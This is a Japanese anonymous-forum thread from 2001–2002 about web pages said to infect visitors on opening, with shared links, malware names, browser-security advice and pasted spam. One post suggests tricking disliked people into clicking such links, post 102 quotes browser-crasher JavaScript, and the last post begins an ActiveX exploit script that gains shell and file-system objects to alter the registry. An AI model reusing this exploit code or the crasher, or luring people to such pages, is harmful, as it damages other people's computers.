開いただけでウイルスに感染するページ

開いただけでウイルス ..

2:名無しさん＠お腹いっぱい。
01/07/11 19:37
あなたの心です

3:名無しさん＠お腹いっぱい。
01/07/11 19:40
あなたの人生です

4:名無しさん＠お腹いっぱい。
01/07/11 19:46
この板、まったりしていてイカすなあ

5:名無しさん＠お腹いっぱい。
01/07/11 19:49
http://（略）/list.doc

6:
01/07/11 19:50
関係無いけど、hsjさん、海外でも話題になってるね。IISエクスプロイチー
の件で。

7:名無しさん＠お腹いっぱい。
01/07/11 20:00
sage

8:名無しさん＠お腹いっぱい。
01/07/11 20:38
私は便器です。

9:どうよ？
01/07/11 21:26
URLﾘﾝｸ(samurai-x.hypermart.net)

10:名無しさん＠お腹いっぱい。
01/07/11 21:35
↑IP抜かれるだけだし俺にはもう効かん

11:名無しさん＠お腹いっぱい。
01/07/11 21:39
聞いただけでウイルスに感染するページ

12:名無しさん＠お腹いっぱい。
01/07/11 22:51

URLﾘﾝｸ(easyweb.easynet.co.uk)
どうぞ

13:名無しさん＠お腹いっぱい。
01/07/11 23:52
age

14:名無しさん＠お腹いっぱい。
01/07/12 03:52
>>12
こわい！

15:名無しさん
01/07/12 04:08
>>12
W97M.Melissa.A

16:名無しさん＠お腹いっぱい。
01/07/12 05:42
yeds

17:名無しさん＠お腹いっぱい。
01/07/13 17:53
開いただけでウィルスに感染するページへの
リンク集です。ここで収集して嫌なやつにそのURLを
どんどんクリックさせてしまいましょう！！
URLﾘﾝｸ(members.tripod.co.jp)

18:17
01/07/13 18:06
間違えました！上のURLはまったく関係ない所でした。
正しくはここです。
URLﾘﾝｸ(www.ad-office.ne.jp)

19:17
01/07/13 21:46
また間違えました！
上のURLは全然別のものでした。正しくは元の通り
URLﾘﾝｸ(members.tripod.co.jp)
ここです。

20:17
01/07/13 21:58
はぁ～偽物uzee
まぁ見ればわかると思うけど、正しくは↓ね。
URLﾘﾝｸ(www.ad-office.ne.jp)

21:17
01/07/13 22:06
ホンモノの17はsageません。
したがって20はニセモノです。
20のサイトはただの宣伝です。注意。

22:名無しさん＠お腹いっぱい。
01/07/13 22:07
ブラクラ張るな！

対象URL＝URLﾘﾝｸ(members.tripod.co.jp)
--------------------------------------------------------------------------------
FDDアタック / conconクラッシャー [HTMLタグ，JavaScript]

IMGタグやJavaScript等によりfileスキーマを参照します。
フロッピーディスクドライブへの不用なアクセスが続いたり，
ブラウザの設定によってはOSがクラッシュする可能性があります。

23:善人
01/07/13 22:10
宣伝手伝うよ

〒292-0045 千葉県木更津市清見台3-1-11 アドオフィス
TEL&FAX 0438-25-7643
E-Mail info@ad-office.ne.jp

24:名無しさん＠お腹いっぱい。
01/07/13 22:17
NEXTWEBに直接電話した方が早い

25:名無しさん＠お腹いっぱい。
01/07/13 22:18
>>22
ソース見た限りではオンラインカジノらしいけど・・・
開いたらやヴぁいのか怖いなー

26:名無しさん＠お腹いっぱい。
01/07/13 22:22
ふ～んNEXTWEBの鯖は、公序良俗に反することは禁止なんだ

27:名無しさん＠お腹いっぱい。
01/07/13 22:28
小僧相手に大人の対応しすぎ（ｗ

28:名無しさん＠お腹いっぱい。
01/07/13 22:41
　　　　　＿＿＿＿
　　　／∵∴∵∴＼
　　 /∵∴∵∴∵∴＼
　　/∵∴∴,（･）（･）∴|
　　|∵∵／　　 ○　＼|
　　|∵ /　　三　|　三　|　　／￣￣￣￣
　　|∵ |　　　＿_|＿_ 　|　＜　>>17 消えろバカ
　　＼|　　　＼＿/　／　　＼＿＿＿＿
　　　　＼＿＿＿_／

29:名無しさん＠お腹いっぱい。
01/07/13 22:44
突然子供の対応になったな（ｗ
まあ好きにやれや

30:名無しさん＠お腹いっぱい。
01/07/14 01:12
反省の色無しか・・・

コピペ厨房もいい加減にしろ

31:名無しさん＠お腹いっぱい。
01/07/14 04:34
>>10～30　(ただし9は除く)
インターネット喫茶から開いたけど何も起こらなかったよ。

32:名無しさん＠お腹いっぱい
01/07/14 21:38
210.178.180.226,sunrpc
ここ。

33:名無しさん＠お腹いっぱい
01/07/14 21:38
133.31.40.42,auth
ここも良いよ。

34:
01/07/14 22:20
>>32
ソコのさーばーって、111がhttpなの？？

35:名無しさん＠お腹いっぱい。
01/07/15 01:12
このＵＲＬはどうなんでしょうか？
何でも入ったらＣドライブの中身を消されてしまうらしくて・・・
これのせいであるスレッドの住人が疑心暗鬼になっています。
ブラクラじゃないって言う人と実際に入ってＣドライブ消されて怒っている人が半々で・・・

URLﾘﾝｸ(www.bigfreehost.com)

自分も恐くてクリックしていません。

36:名無しさん＠お腹いっぱい。
01/07/15 01:31
>>35
フレーム使った、最高にくだらないブラクラもどき。
消されたって言ってるのは、わかってる奴がネタでいってるだけ

37:名無しさん＠お腹いっぱい。
01/07/15 01:46
URLﾘﾝｸ(www.rental-web.com)
なんすか？マジで

38:名無しさん＠お腹いっぱい。
01/07/15 01:51
>>37
なんすかって言われてもなあ・・・
ちょっとしたいたずらみたいなもんだよ。
そこのサイトは問題あるサイトじゃないし。
つーかブラウザのセキュリティ設定はちゃんとしとこうな

39:マジね
01/07/15 02:19
>>38
ブラウザのセキュリティ設定ってなんですか？串ですか？ファイアーウォールですか？
馬鹿げた質問ですみません

40:名無しさん＠お腹いっぱい。
01/07/15 02:32
このページって何ですか？
すごく役立つことが沢山かいてあるのですが、
皆に嫌がられているようで意味が分かりません。
とろあえずブラクラではないようです。
URLﾘﾝｸ(members.tripod.co.jp)

41:名無しさん＠お腹いっぱい。
01/07/15 02:33
>>39
Java、ActiveX、アクティブスクリプト、クッキーとかを
実行させるかどうかってこと。Java、ActiveXなんかは
切って当然ってぐらいだけど、アクティブスクリプト、
クッキーも結構厄介なもんだから、ダイアログを出すぐらいに
しといたほうが確実。かなり面倒だけど

まあそこらへんの設定のやり方は初心者板とかで聞いてくれや。
さすがにIEの設定まで教えてられん

42:名無しさん＠お腹いっぱい。
01/07/15 02:34
　　　　　＿＿＿＿_＿
　　　／＿　　　　　　|
　　 / 　＼￣￣￣￣|
　　/　　／　 ―　― |
　　|　 /　　　-　　- |
　 ||| (6　　　　　　>　|
　| | |　　　　 ┏━┓|　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
| | | | 　　　　┃─┃|　＜　正直、 >>40 消えてくれ。
|| | | | 　＼　┃　 ┃/　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
| || |　|　　　￣　￣|

43:名無しさん＠お腹いっぱい。
01/07/15 02:36
>>40
昨日のやつか？まだ懲りてないなら、
「大人の対応」させてもらうが。

44:マジね
01/07/15 02:38
>>41
感謝です

45:名無しさん＠お腹いっぱい。
01/07/15 02:52
>>43
邪魔ものは氏ね

46:名無しさん＠お腹いっぱい。
01/07/15 03:06
邪魔物はお前だろうが（藁
まぁせいぜいアクセス制限掛けられないようにな

47:名無しさん＠お腹いっぱい。
01/07/15 03:08
>>46
これは多分別人。ほっとけばいい。

48:名無しさん＠お腹いっぱい。
01/07/16 02:07
URLﾘﾝｸ(hpmboard1.nifty.com)

49:名無しさん＠お腹いっぱい。
01/07/16 16:52

50:あぼーん
あぼーん
あぼーん

51:名無しさん＠お腹いっぱい。
01/07/17 16:52
>>50
ｽｰﾊﾟｰﾊｶｰ発見。

52:名無しさん＠お腹いっぱい。
01/07/17 17:32
リンクたどっただけとの噂

53:>50
01/07/19 23:39
凄い！ほんとｽｰﾊﾟｰﾊｶｰどうぢてこんなことが可能なのか？
尊敬！

54:>36
01/07/20 16:25
＞35さんのURL、他の板でウイルスだとか逝ってましたが
どんな悪さをするんでしょうか？

55:浅野　哲
01/07/20 16:30
centaur412@jcom.home.ne.jp
何でも良いから送ってね～

56:浅野　哲
01/07/20 16:31
マジでお願い～

57:名無しさん＠お腹いっぱい。
01/07/20 16:39
>>55-56
あはは。無駄だよ～。

58:名無しさん＠お腹いっぱい。
01/07/20 19:28
だからなんもしねえっての。
人の言う事信じられないなら自分でソース見て考えろよ

59:名無しさん＠お腹いっぱい。
01/07/20 19:29
ただ繰り返しドライブがカタカタ言うだけ。
ctrl+alt+delで殺して終わり。

60:名無しさん＠お腹いっぱい。
01/07/26 03:30

61:
01/08/03 15:55
　　　　　＿＿＿＿_＿
　　　／＿　　　　　　|
　　 / 　＼￣￣￣￣|
　　/　　／　 ―　― |
　　|　 /　　　-　　- |
　 (6　　　　　　>　|
　　　　　 ┏━┓|　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　┃─┃|　＜　正直、 >>40 消えてくれ。
　＼　┃　 ┃/　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　￣　￣|

62:名無しさん＠お腹いっぱい。
01/08/03 17:02
>>61
激しくずれています。男斗水鳥拳??

63:あぼーん
あぼーん
あぼーん

64:名無しさん＠お腹いっぱい。
01/08/04 00:28
URL貼れば誰か荒らしてくれるとでも思ってんの？

65:名無しさん＠お腹いっぱい。
01/08/04 04:35
>>63
君の心が荒れているのだよ

66:sage
01/08/04 04:51
>>65
うまい！！

67:名無しさん＠お腹いっぱい。
01/08/04 14:56
URLﾘﾝｸ(edit.my.yahoo.co.jp)

68:名無しさん＠お腹いっぱい。
01/08/05 14:13
ttn8iv524g@mx4.ttcn.ne.jp
このひとから、おくられてきました。
パソコンがおわりました。

69:名無しさん＠お腹いっぱい。
01/08/06 18:39

203.165.230.223

70:ＭＫinch
01/08/06 19:21
URLﾘﾝｸ(easyweb.easynet.co.uk)
開くなよ

71:名無しさん＠お腹いっぱい。
01/08/06 21:27
>>70
あなたは感染ファイルのダウンロードを試みようとしています（藁

72:名無しさん＠お腹いっぱい。
01/08/07 00:36
>>70-71
これって続行したらどうなるの？WinMeでも感染しちゃうのかな>>happy99

73:名無しさん＠お腹いっぱい。
01/08/07 01:59
>>72
キレイな花火を見ようョ！（ﾜﾗ

74:名無しさん＠お腹いっぱい。
01/08/07 02:41
---------------------------
Norton AntiVirus
---------------------------
Norton AntiVirus は Happy99.Worm ｳｨﾙｽを以下の場所で検出しました

ﾌｧｲﾙ名: (略)\Temporary Internet Files\Content.IE5\W1AFG9IF\Happy99[1].exe
ﾄﾞﾒｲﾝ名:(秘密)
ｼｽﾃﾑ名: (秘密)
ﾕｰｻﾞｰ名:(秘密)

このﾌｧｲﾙを修復できません｡
---------------------------
OK
---------------------------

75:名無しさん＠お腹いっぱい。
01/08/08 07:42
URLﾘﾝｸ(easyweb.easynet.co.uk)
開かない方がいいかも。。。

76:名無しさん＠お腹いっぱい。
01/08/21 21:24
>>75
それ何？
拡張子mp3で感染することなんてあるの？

77:(ﾟДﾟ)ﾊｧ?
01/08/21 21:36
>>75
MTXだって（Ｗ
本当の拡張子.pifでしょ。

78:偽天
01/08/21 21:51
バインド？

79:名無しさん＠お腹いっぱい。
01/08/21 22:58
3 名前：正直、スマンカッタ投稿日：2001/08/21(火) 15:05
修正　&　McAfeeにパクられました
URLﾘﾝｸ(slashdot.jp)

McAfeeウィルス対策をコピペでぱくる
URLﾘﾝｸ(www.iosnet.ne.jp)

80:あげ
01/08/22 07:51
ぱくりアゲ

81:初心者
01/08/22 10:43
感染するとどうなるんですか？
あとＱ２とかは勝手にインストールされてしまうらしいって
聞いたのですが、よくわかりません。
教えて下さい。
簡単なチェック方法きぼ～～ん

82:名無しさん＠お腹いっぱい。
01/08/22 14:24
>>75ってクリックするだけで感染しますか？

83:名無しさん＠お腹いっぱい。
01/08/22 15:13
>>81
変に設定を緩めてなければ、勝手には・・そうそうない。
クリックしなけりゃ大丈夫
でも、こんな巧妙なパターンを仕掛けられると、クリックする可能性あるね。
URLﾘﾝｸ(www.police.pref.osaka.jp)

あと、ウイルス等には、この設定を緩めるもの居るので要注意。

84:名無しさん＠お腹いっぱい。
01/08/22 15:25
ポートスキャンされてる時にゾーンアラームなどの
ファイアウォールソフト入れてないと侵入されますか？

85:
01/08/22 15:28
>>82
ブラウザぢゃ開けないよ。あくまでMP3として認識するみたいね。
ってーか、拡張子けづってあるのか？？>hiros
ローカルに保存して実行するのはよした方が良いね。一応念のため。

>>83
その表示でる頃には我慢汁出てるから。。巧妙だね。

86:名無しさん＠お腹いっぱい。
01/08/22 16:01
おまえなんでまだ居るんだよ
いい加減自首してくれ

87:◇GSxyaeQs
01/08/30 14:25 fCYyGEEg
僕のポテトはチンチンチン
チンチンポテトマイクロマジックー♪

88:名無しさん＠お腹いっぱい。
01/08/30 15:53 q9bARPwE
>>87
３０代発見。

89:名無しさん＠お腹いっぱい。
01/08/30 16:37 ruy2juu2
俺昔MP3ダウンロードしたとき、ファイルサイズが5Mにもなるのに、
音が鳴らなかった。他のファイルは音が鳴るのに、それだけはダメだった。
やばいと思って再インストールしたが、あれはウイルスだったんだろうか…

90:名無しさん＠お腹いっぱい。
01/08/30 17:38 TVg1npA.
>>89
ネタでしょうが、ウィルスなはずが無いです。仮にウィルスのコードが埋め込まれていうようが
実行ファイルでないのでウィルスを起動できません。
何かの偽装ファイルじゃないでしょうか

91:tomo
01/08/31 14:57 4t1V4bfM
あったらほしいんだけど。

92:名無しさん＠お腹いっぱい。
01/09/01 17:50 ozIMKsQc
>>28最高にﾜﾗﾀ

93:89
01/09/02 00:43 wivt7Qp.
>>90 それが再生できるんで…
それからさっぱりアングラMP3はダウソしてない。

94:名無しさん＠お腹いっぱい。
01/09/02 00:45 3OHXOh8o
マルチポスト　　スマソ

アップローダーにある、この圧縮ファイルなんですか？
解凍するとエラー出ます。エラー出たファイル削除できなねー。
URLﾘﾝｸ(www15.big.or.jp)

95:名無しさん＠お腹いっぱい。
01/09/02 03:14 pbL3/KjU
しつもん。

>>50 ってマジ？
マジなら凄いんじゃない？
なぜみんなもっと驚かない？

96:名無しさん＠お腹いっぱい。
01/09/02 03:34 9WIIuGkY
リンクたどって調べただけだからね

97:名無しさん＠お腹いっぱい。
01/09/07 01:54
＞89
それ、バイナリエディタとかでデータ確かめてみた？
俺も似たようなことあったよ。
KturnってとこからダウソしたMP3、再生しても音ならず。
なして？と思ってデータ確かめたら、ヘッダはあれど肝心の音データは
全部000000000・・・・・・・・・・・だった。
おっそろしく回線細く、数時間かけて落としたのに・・・
そこにあった別のMP3はちゃんとしてたから、UPした人のポカミスか？？
意味分からん・

98:名無しさん＠お腹いっぱい。
01/09/07 02:05
>>93
インプラント系偽装でしょ
表向きはmp3だけど中に他のデータが入ってるの。
割れとかで良くある。

99:　
01/09/07 04:52
W97M.Melissa.A
に感染したらどうなるの？

さっき踏んじゃってさ、オイラのPC染みちゃってるのさ。

100:名無しさん＠お腹いっぱい。
01/09/07 22:04
>>1
注：類似スレ警報！

これからはこちらへ

URLﾘﾝｸ(ton.2ch.net)

101:名無しさん＠お腹いっぱい。
01/09/10 23:00
URLﾘﾝｸ(www.geocities.co.jp)

102:（´Д｀；）
01/09/10 23:30
>>101
<script language="javascript">
w=window.open("URLﾘﾝｸ(#)<)全く・・・・/newtype/list.doc");
</script>
<script language="javascript">
w=window.open("7777.htm");
</script>

ココで引っかかる奴は居まいと思うけど。。。

103:(￣ー￣)
01/09/10 23:59
この前ブラクラで再起動したら変な画面出たよ、
英語でなんか「yes,no]って書いてあったからノーにしといた。何だったんだか気になる。

104:あぼーん
あぼーん
あぼーん

105:名無しさん＠お腹いっぱい。
01/09/11 14:13
↑犯罪者発見。

106:これ何？
01/09/11 14:15
URLﾘﾝｸ(members.tripod.co.jp)

107:名無しさん＠お腹いっぱい。
01/09/11 14:40
>>106
javascriptをonにしてなければ怖くない。
onにしてると、ｵﾄｺの裸画像数点＋VBS.LoveLetter.CI＋W95.MTX.dr＋ｳｨﾝﾄﾞ無限ｵｰﾌﾟﾝ。

108:　
01/09/11 15:20
>106
URLﾘﾝｸ(page3.auctions.yahoo.co.jp)
競泳パンツも買って欲しいんだよ（ｗ
・・にほひ付き？

109:名無しさん＠お腹いっぱい。
01/09/11 19:03
***/*****
***?
***
***
***

110:名無しさん＠お腹いっぱい。
01/09/12 23:35
>>103
心配だったらOS再インストールするほうがいいんじゃない？
とりあえずウイルススキャンしたほうがいいですね。

111:http://ojiji.net/ntv/
01/09/13 03:19
URLﾘﾝｸ(ojiji.net)
URLﾘﾝｸ(ojiji.net)

112:名無しさん＠お腹いっぱい。
01/09/13 04:46
>>111はブラクラ

113:怖いね
01/09/14 21:43
先月から今月にかけてMP3のsma****anet逝ったやつはどうだった？
運が悪いことに最近mcafeeのサポートが切れてアンインストールしてた。
俺はｊａｖａ他全て切ってたけど感染する寸前だったよ。
途中で変に読み込み遅かったから気が付いたからよかったけど。
再起動したら壁紙変えられた。
haptimeとか言うやつで。
開いただけで感染するページあるんだなと思った。

114:名無しさん＠お腹いっぱい。
01/09/16 20:54
亀スレならすまんが、相手のコンピューター破壊できるウイルスと
どんな警戒厳重なコンピューターでもハッキングできる方法教えてくれ。
開いただけで感染するなんて、メチャ欲しいんだけど

115:名無しさん＠お腹いっぱい。
01/09/16 21:20
＞114　狂牛病？

116:名無しさん＠お腹いっぱい。
01/09/16 21:21
>>114
＿＿＿_　　　　　　　　　　　　　　　＿＿＿＿
|自分で|　　　　　＿＿＿　　　　 |見つけた |
|さがせ:|Λ＿Λ |ｲｯﾃﾖｼ| Λ_Λ｜ら報告　|Λ＿Λ
〃￣ ∩　´∀｀）〃￣　∩ ﾟДﾟ）〃￣￣　∩　･∀･）
　　　　ヾ.　　　　）　　　ヾ　　　|　　　　　ヾ.　　　）
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣＼
＼　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　＼
　 |￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣|
　 |　　　　　　　　スレッド評価認定委員会:　　　　　　　　　|
　 |　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|
＼|　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|
　￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣

117:名無しさん＠お腹いっぱい。
01/09/16 22:28
GodmessageとかNood4ってどうなのよ？
感染した人いる？

118:ななし
01/09/17 00:49
URLﾘﾝｸ(www.excite.co.jp)

↑これってブラクラなんですか？

119:名無しさん＠お腹いっぱい。
01/09/17 00:59
モロ、無修正画像サイト発見！

URLﾘﾝｸ(www.sex-jp.net)
URLﾘﾝｸ(www.sex-jp.net)
URLﾘﾝｸ(www.sex-jp.net)
URLﾘﾝｸ(www.sex-jp.net)

120:名無しさん＠お腹いっぱい。
01/09/18 02:08
初心者質問スレにも書きこんじゃったけど、
URLﾘﾝｸ(isweb27.infoseek.co.jp)
ここって何だろ？本当に飛んだだけで感染するもんなのかな？

121:名無しさん＠お腹いっぱい。
01/09/18 02:39
そんな事いわれたら飛べない・・・

122:名無しさん＠お腹いっぱい。
01/09/18 17:50
>>120のリンク、ノートンから警告バシバシ出てます。
VBS.Haptime.A@mm　ウイルスだそうです。
飛びたい人は
URLﾘﾝｸ(www.trendmicro.co.jp)
これを読んでからどうぞ。

123:名無しさん＠お腹いっぱい。
01/09/18 17:54
しかし、>>120って無責任なヤツだな。
市ね。

124:120
01/09/18 21:38
直リソ＆説明不足スマソ。
たまたま巡回してて、↑のサイトに飛んだら突然ノートン先生が
警告したのでビックリして、気が動転していたようです。
身をもって体験して来たんですが…。

結果からいうと、どうやら『自分は』感染しなかったようです。
ノートンで何度もスキャンしたし、haptime専用駆除ツールも使ってみた
のですが、一切検出されませんでした。
しかし、だからといって他の人が安全とは限りませんので、
自分で直林しといていうのもなんですが、
決して不用意にクリックしないでください。

今まで自分は飛んだだけでウィルスに感染するとは思っていなかったので、
ノートンで警告が出て？？だったので、なにも知らずにリンク張ってしまい
すいませんでした。

しかし、飛んだだけでウィルスに感染なんて怖いですね。
みなさんも気をつけてください。なんでもない安全なサイトでも
感染していることがあるようですから。

125:
01/09/19 12:01
なんとタイムリーなスレタイトルじゃのう

126:名無しさん＠お腹いっぱい。
01/09/19 12:16
>>124
不用意にリンクをクリックする奴も悪い。
ここの住人は引っかかったりしないから気にするな

127:名無しさん＠お腹いっぱい。
01/09/19 12:29
ごめ、俺おみとろん入れてから不用意にクリックしまくってるよ。
んで120はまだ踏んでないけど、ActiveXとかJSオフとかでも感染するの？
どういうしくみなんだろ？つか>122のリンク先がおかしいんだけど･･･

128:名無しさん＠お腹いっぱい。
01/09/19 12:39
＞＞127
URLﾘﾝｸ(www.trendmicro.co.jp)
全部更新中？

129:名無しさん＠お腹いっぱい。
01/09/19 13:43
　お粗末msn　さらしあげ。

130:名無しさん＠お腹いっぱい。
01/09/19 17:31
お粗末マイクロソフトさらしあげ

131:名無しさん＠お腹いっぱい。
01/09/20 00:31
こんかいのNimdaでもトレンドマイクロ対応遅かったね。
これでウイルスバスターがｸｿだということがハッキリしたよ。

132:名無しさん＠お腹いっぱい。
01/09/20 00:40
ウイルスっていうか、マイ糞のバグだからマイ糞が悪い。
マイ糞のセキュリティ＝ヤリ○ン女

133:sage
01/09/20 02:43
あげ

134:名無しさん＠お腹いっぱい。
01/09/20 09:18
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない？

見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

3番目に悪いのは、それに気がつかずM$製品を使う
厨房ユーザー(藁

135:名無しさん＠お腹いっぱい。
01/09/20 09:43
URLﾘﾝｸ(www.qingpao.com)

136:名無しさん＠お腹いっぱい。
01/09/20 09:46
>>134
シャネルみたいなもんでねえの？

137:
01/09/20 10:54
>>134
WindowsNTを使うにせよ、IISをやめてApacheでやってくれてたら
防げた被害なんですけどね、最近のCodeRedとかNimdaは。

それはともかく、感染したオリコ URLﾘﾝｸ(www.orico.co.jp)
のトップページには、「お知らせ」と題して、

9/19 11:30～21:30までの間、システムメンテナンスの為
サーバを停止しました。ご迷惑をお掛けして申し訳ござい
ませんでした。

と書いてあるよ。迷惑かけたのはサーバ停止じゃなくって
ウイルス感染の踏み台になったことだっていうのに、一言
もなし。どうよこれ。

138:
01/09/20 11:15
>>137
ほんとか？
クライアントのPCが感染していて書き換えられたHTMLファイルをApacheサーバーに
アップロードして公開すれば、Apacheだって加害者になるんじゃないのか？
ワームとしては感染しなくてもクライアントがWindowsなら危険度は変わらないと思うが。

139:名無しさん＠お腹いっぱい。
01/09/20 11:18
>>137
コンテンツ作成者のPCに感染して、HD 内の HTML を汚染されて、それを
apache (UNIX でも何でも) なり何なりに upload して公開した時点で
加害者になると思われ。

140:名無しさん＠お腹いっぱい。
01/09/20 11:24
IEでJavaScript切るのはどうやるんですか?

141:名無しさん＠お腹いっぱい。
01/09/20 11:41
>>138-139
自動で増殖する機構がないぶんﾖﾎｰﾄﾞましかと思われ。

142:名無しさん＠お腹いっぱい。
01/09/20 11:44
>>137
ApacheはNimdaの影響で落ちるらしいよ。

143:名無しさん＠お腹いっぱい。
01/09/20 11:47
漏れ、19日の朝、建築ナビってHPみたら、Readme.exeもらいました。
HPは現在落ちてるもよう。
McAfee ウイルススキャン Ver. 5.13aの最新Datファイルで削除したよ。
7匹もいた。でも*.emlはそのまま130個もあったよ。即削除。全部80.0KBだった。
あれはウィルスの卵だね。ダブルクリックすると生まれるよ。

144:名無しさん＠お腹いっぱい。
01/09/20 12:10
>>138
ダウンロードすべき本体がいないと思うが。

145:名無しさん＠お腹いっぱい。
01/09/20 12:12
>>142
それはApacheログがHDDを圧迫して落ちるらしい。
同じIPで４段５段のアタックをかましてくるからなぁ。
nimdaウザッ

146:
01/09/20 12:19
phpウイルスの作成ツール出たら、どうなる事やら。。。

147:名無しさん＠お腹いっぱい。
01/09/20 12:35
>>145
うちじゃ，logrotate.conf を daily にしたよ．しゃあ
ないわね．

148:名無しさん＠お腹いっぱい。
01/09/20 13:52
かちゅーしゃでも感染するんですか？

149:名無しさん＠お腹いっぱい。
01/09/20 20:47
>>140
やれやれ.....。
そういう人はブラウザのセキュリティレベルを「高」に設定しておきな。ワクチンもきちんと更新しろよ。

150:nimda
01/09/20 22:42
URLﾘﾝｸ(www.hyundaijapan.co.jp)

151:あぼーん
あぼーん
あぼーん

152:
01/10/17 22:35
>>151
どうせ、むかつく奴とかのメアドだろ・・・

はい、そうですか　と送るバカいるのか？

153:影猫
01/10/31 01:36
JS.Exception.Exploit
URLﾘﾝｸ(www.clubtgp.com)
詳細情報
URLﾘﾝｸ(www.symantec.com)

154:FUCK usa
02/01/01 23:10
URLﾘﾝｸ(influence.org)

155:IE StartPageGen
02/01/01 23:42


156:名無しさん＠お腹いっぱい。
02/01/01 23:47
>>155 のソースをメモ帳で拡張子HTMLで保存。　そして実行する

157:ASL
02/01/02 16:36
なんか…

158:名無しさん＠お腹いっぱい。
02/01/02 16:37
これも

159:ASL
02/01/02 16:48
あれですね。

160:ASL
02/01/02 16:49
YAHOOのニュースにあった。
URLﾘﾝｸ(headlines.yahoo.co.jp)

161:な
02/01/02 17:21
yahooもアホ揃いか。

162:
02/01/02 18:30

URLﾘﾝｸ(www.gokhu.com)

163:名無しさん＠お腹いっぱい。
02/01/02 19:23
view-source:URLﾘﾝｸ(www.iespana.es)
ここに開いただけで感染するようなトロイは仕込まれているでしょうか。

164:findlu@21cn.com
02/01/02 22:29
From:Hypnosis < thebvg@lists.thebvg1.net >
To: computertips-feedback@developingdots.com
Subject:Give Hypnosis for the Holidays!
Date:***
Received: from [64.37.121.131] by developingdots.com with ESMTP id ***; Mon,***
X-Info:To report abuse forward this mail to thebvg@complaints.em5000.com . Please include all mail header fields!
Message-ID: < 7896456314jkhbjikgyv846786@exploder2.em5000.net >
-----
To unsubscribe click here and enter your email address.
If the above link does not work, please copy and paste this address into
your browser window:

URLﾘﾝｸ(www.em5000.com)

165:名無しさん＠お腹いっぱい。
02/01/03 06:49
YAHOO!のNEWSからきました！

166:
02/01/05 00:37
URLﾘﾝｸ(members.fortunecity.com)

ここってどうですか？

167:名無しさん＠お腹いっぱい。
02/01/05 02:35
なんかいろんな所で>>155が紹介されてるけど
これってインターネット上にある場合は警告でない？
見ただけでは問題ないと思うけど。
そりゃ保存してローカル権限でみたらまずいだろうけど。

168:
02/01/05 02:50
だから、ネット上には保存してローカル権限で見させるページ作ればいいんじゃんか

169:167
02/01/05 02:54
>>168
それができれば苦労しないが。(何の苦労だか(w
それともなんかローカル権限で見させるセキュリティーホールでも有るの？

170:
02/01/05 13:53
>>169
あふぉ、それくらい自分で作れないなら逝ってよし

171:167
02/01/06 00:13
>>170
だからそれが出来たら大問題でしょ。
古いセキュリティーホール使ってやるって事なら出来ないと一緒。
作れるならどうやって作るか説明してくれ。

俺はせいぜいGetHTMLとかのツールでサイトを丸ごと落とさせるような
サイトを作ってそこに仕込むぐらいの事しか思いつかん。

172:名無しさん＠お腹いっぱい。
02/01/06 01:42
URLﾘﾝｸ(www.top.or.jp)
こんな事やめてくれ。

173:名無しさん＠お腹いっぱい。
02/01/07 00:24
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: realwealth@maxleft.com
Message-ID:< 30011332240161.MANKO@mta05-svc.ntlworld.com >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email realwealthin2002@yahoo.com
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to realwealth@maxleft.com ...Thanks
URLﾘﾝｸ(www.em5000.com)
URLﾘﾝｸ(www.em5000.com)
-----
mta05-svc.ntlworld.com
<<< 220 mta05-svc@ntlworld.com ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 mta05-svc@ntlworld.com
>>> MAIL FROM:<"TEST URLﾘﾝｸ(www.nanet.co.jp) requested from pc1-cowc2-0-cust129rencable-ntl-com@mta05-svc.ntlworld.com >
<<< 250 Sender <"TEST URLﾘﾝｸ(www.nanet.co.jp) requested from pc1-cowc2-0-cust129-ren-cable-ntl-com@mta05-svc.ntlworld.com > Ok
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 550 relaying mail to nanet.co.jp is not allowed

netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST URLﾘﾝｸ(www.nanet.co.jp) requested from realwealth-maxleft-com@netmongol.com
<<< 501 unacceptable mail address

174:あぼーん
あぼーん
あぼーん

175:水泥棒！「「菊池記念館」」
02/01/07 03:15
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX初始化过程(为达到修改用户注册表所必须的准备程序 )
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");< br>a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createI nstance();
